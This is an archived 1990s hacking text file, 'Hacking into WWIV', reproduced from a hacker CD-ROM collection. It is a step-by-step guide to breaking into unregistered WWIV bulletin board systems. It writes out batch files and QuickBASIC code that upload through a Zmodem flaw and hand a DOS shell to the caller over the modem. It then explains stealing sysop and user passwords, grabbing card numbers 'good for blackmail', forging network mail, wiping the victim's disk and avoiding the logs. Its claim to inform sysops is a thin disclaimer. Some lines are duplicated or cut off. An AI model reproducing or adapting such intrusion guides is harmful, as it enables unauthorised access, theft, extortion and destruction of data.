home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / bbs / wwivhack.txt < prev   
Encoding:
Text File  |  2003-06-11  |  6.7 KB  |  176 lines

  1.  
  2.  
  3.                        Hacking into WWIV, Second Edition
  4.  
  5.                                  by Vision
  6.  
  7. WWIV, when unmodified and when not using external chains/protocols/programs,
  8. is essentially impregnable.  However, good ol' Wayne Bell has also distributed
  9. the source code, external network programs, protocol support, and other nifty
  10. benefits that have made life for a WWIV hack much easier.  This textfile will
  11. describe the essentials of hacking into WWIV via a hole in unregis
  12. The key here is >unregistered<, since this hack works through DSZ's refusal to
  13. reroute Zmodem-batch downloads without registration.
  14.  
  15. Step One:
  16.  
  17. Call your local WWIV startup under a false alias.  They are usually struggling
  18.  and haven't had the time to 'register' DSZ with PUTSNP or register their
  19.   source so they can patch this hole.  You need to find out what COM port they
  20.    are operating on.  Once you do this, create several files:
  21.  
  22.       a) DLZ.BAT - this should read:
  23.       a) DLZ.BAT - this should read:
  24.                 CLS
  25.                 CTTY CON
  26.                 DSZ port1 speed2400 sz %1
  27.                 CTTY COM1
  28.                 CLS
  29.  
  30.          Substituting, of course, the correct COM port.  This will allow
  31.           you to download files remotely via Zmodem.
  32.  
  33.       b) HACK.BAT - this should read:
  34.                 CTTY COM1
  35.                 COMMAND
  36.  
  37.          Again, if the SysOp is running from another COMport, substitute the
  38.          correct number.  This will turn over control of the computer to
  39.          whatever device is on COM1 (the modem) and run the command
  40.          interpreter.
  41.  
  42.       c) NETWORK.COM - the QuickBASIC source for this is:
  43.                 SHELL "DEL NETWORK.COM"
  44.                 SHELL "HACK.BAT"
  45.          Compile & link it to NETWORK.EXE then rename it to NETWORK.COM.  This
  46.          will delete itself and run HACK.BAT.  If you want, right it in Pasca
  47.          or C, but it's not going to make any difference.
  48.  
  49. Step Two:
  50.  
  51. Call back and go straight to the transfer section.  Upload (to any directory,
  52. or directly to the SysOp).  When prompted for the file name, enter
  53. "????????.???" (eight ?'s then three ?'s, without the quotes).  You'll see
  54. the Zmodem receive string.  Upload one of the above files.  The BBS will
  55. say, "transfer aborted"... but you know better!  Repeat until all files
  56. have been uploaded.
  57.  
  58. Step Three:
  59.  
  60. Call back very shortly afterwards (thirty seconds, no more, no less).  When
  61. you get the "NN:" prompt, enter "!-@NETWORK@-!" (again, no quotes).  This
  62. will access the unpassworded WWIVnet account (the password routines are
  63. external).  When the BBS sees this, it will drop to DOS and run
  64. NETWORK.EXE.
  65.     However, since COMs are run before EXEs, your NETWORK.COM will be executed
  66.     promptly turning control over to you via HACK.BAT!  Now that you are in
  67.     promptly turning control over to you via HACK.BAT!  Now that you are in
  68.     DOS, there are a few things that you must immediately do.
  69.  
  70. Step Four:
  71.  
  72. Use DLZ.BAT to leech the target's CONFIG.DAT from his main BBS directory (the
  73. one you were dumped in when you arrived).  The format is:
  74.  
  75.         DLZ <filename>
  76.  
  77.   where <filename> is the name of the file.  For example,
  78.  
  79.         DLZ CONFIG.DAT
  80.  
  81.    will leech the configuration file.
  82.  
  83. Step Five:
  84.  
  85. Go to his BBS DATA directory.  This is usually C:\WWIV\DATA, but you might
  86. have to look around a little bit.  When you find it, use DLZ to leech the
  87. target's USER.LST.  Using Norton Utilities or any hex and/or text editor, it
  88. is very easy to see where the usernames and their passwords are stored.
  89. Step Six:
  90.  
  91. If the target is in WWIVnet or WWIVlink, download his/her CALLOUT.NET file fro
  92.  the aforementioned data directory.  This will be explained later.
  93.  
  94. Step Seven:
  95.  
  96. Delete HACK.BAT if you haven't already!
  97.  
  98. Step Eight:
  99.  
  100. Look around.  Leech anything that looks interesting.  This includes:
  101.  
  102.            > Private G-Files from the G-File section
  103. good for __/ Lists of credit-card or calling-card numbers
  104. blackmail  \ Pirate files
  105.          --> His dialing directories from Telemate or Telix; these usually
  106.               contain passwords and numbers of private BBS's!
  107.  
  108. Step Nine:
  109.  
  110. Hang up.  If you really hate him, upload Norton's WIPEDISK.EXE along with the
  111. rest of the files, run it, and permanently destroy all data on his drive.
  112. This is generally not recommended, because so far he has NO WAY of knowing
  113. you were in unless he watched.
  114.  
  115. ---------
  116. Tips:
  117. ---------
  118.  
  119.         a) In the target's logs, nothing will show except that you hit 'U'
  120.             when you were online and quit before the upload started.  This is
  121.             virtually always overlooked, and logs more than two days old are
  122.             usually deleted.
  123.  
  124.         b) In the target's net logs, he'll probably see a >NO NET<, which is
  125.             rather common.
  126.  
  127.         c) Very close to the beginning of CONFIG.DAT and right before the
  128.             first directory entry (usually "MSGS\") you will find the target's
  129.             SYSTEM PASSWORD.  This is needed if you are going to log on as
  130.             him or a remote sysop.
  131.  
  132.         d) If a sysop logs on, it is not noted in the LAST FEW CALLERS screen
  133.             OR the logs.
  134.  
  135.         e) A few commands that you will want to try out when you are online as
  136.             #1 are:
  137.  
  138.                 //DOS
  139.                 //UEDIT
  140.                 //BOARDEDIT
  141.                 //DIREDIT
  142.                 //GFILEEDIT
  143.                 //CHUSER
  144.  
  145.              Most require the system password, but if you're online as the
  146.               sysop you already have that.
  147.  
  148.         f) You can have great fun with planted and rouge mailing if you have
  149.             a copy of WWIV and the victim's CALLOUT.NET.  CALLOUT.NET has a
  150.             little note after every entry that looks something like:
  151.  
  152.                 "KAOIYQIGNADFUKG"
  153.  
  154.                Or another random password.  Read WWIVTECH.DOC and W
  155.               (available on most WWIV boards) for more information.  You
  156.                should be able to pick up/drop off mail supposedly from and
  157.                to your target very easily for about a week.  When you start
  158.                getting >BAD PASSWORD<, get back into your victim's DOS
  159.                and get the passwords again!
  160.  
  161.         g) You should be able to figure out what to do with the password file.
  162.  
  163.  
  164.         h) NEVER, NEVER, NEVER press backspace when there is nothing to
  165.             backspace!  This will have catastophic effects and will definintel
  166.              crash CTTY!
  167.  
  168.         i) This file is provided to inform WWIV sysops of this threat.  If
  169.             somebody uses it for "bad" purposes, it is not my fault.
  170.  
  171. Later!
  172.                           \        /
  173.                        <=---\----/--i--s--i--o--n---=>
  174.                               \/
  175.  
  176.